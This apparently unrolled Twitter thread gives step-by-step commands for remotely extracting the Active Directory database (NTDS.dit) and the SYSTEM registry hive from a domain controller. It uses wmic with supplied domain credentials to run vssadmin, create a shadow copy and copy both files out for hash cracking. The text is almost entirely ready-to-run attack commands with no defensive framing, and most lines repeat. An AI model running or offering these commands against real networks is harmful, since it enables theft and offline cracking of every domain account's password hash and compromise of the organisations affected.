,
4 tweets,
1 min read
Read on Twitter
REMOTELY EXTRACT NTDS.DIT & SYSTEM hive
STEP 1: Use ‘wmi’ to execute ‘vssadmin’ to create new volume shadow copy:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
STEP 1: Use ‘wmi’ to execute ‘vssadmin’ to create new volume shadow copy:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
STEP 2: Extract ‘ntds.dit’ from the new volume shadow copy:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
STEP 3: Save off the SYSTEM hive from the registry:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\sys_backup.hiv 2>&1"
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\sys_backup.hiv 2>&1"
STEP 4: Retrieve the ntds.dit and sys_backup.hiv from C:\temp:
C:\temp\ntds.dit
C:\temp\sys_backup.hiv
#hashcrack
C:\temp\ntds.dit
C:\temp\sys_backup.hiv
#hashcrack
